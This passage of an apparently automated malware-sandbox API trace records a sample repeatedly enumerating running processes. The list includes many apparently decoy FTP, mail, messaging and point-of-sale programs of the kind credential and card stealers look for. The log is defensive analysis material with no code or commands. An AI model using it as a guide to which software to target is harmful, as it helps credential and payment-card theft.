th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.373] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0293.375] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0293.376] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0293.378] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.379] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.381] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0293.382] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.383] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.385] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0293.386] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0293.389] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0293.390] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0293.392] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0293.393] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0293.395] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0293.396] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0293.398] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0293.399] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0293.401] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0293.402] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0293.404] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0293.405] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0293.406] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0293.408] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0293.409] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0293.411] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0293.412] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0293.413] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0293.415] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0293.416] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0293.418] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0293.419] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0293.455] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0293.457] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0293.459] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0293.460] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0293.462] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0293.464] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0293.466] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0293.468] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0293.469] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0293.471] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0293.473] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0293.475] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0293.476] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0293.478] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0293.479] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0293.482] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0293.484] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0293.485] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0293.487] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0293.488] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0293.490] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0293.492] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0293.494] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0293.495] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0293.534] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0293.536] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0293.537] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0293.539] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0293.541] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0293.542] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0293.544] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0293.545] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0293.547] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0293.548] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0293.550] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0293.552] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0293.553] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0293.555] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0293.556] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0293.558] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.560] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.562] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0293.563] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0293.564] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0293.566] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0293.567] CloseHandle (hObject=0x2134) returned 1 [0293.567] Sleep (dwMilliseconds=0x64) [0293.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0293.694] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.695] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.697] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.698] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.700] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.702] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: 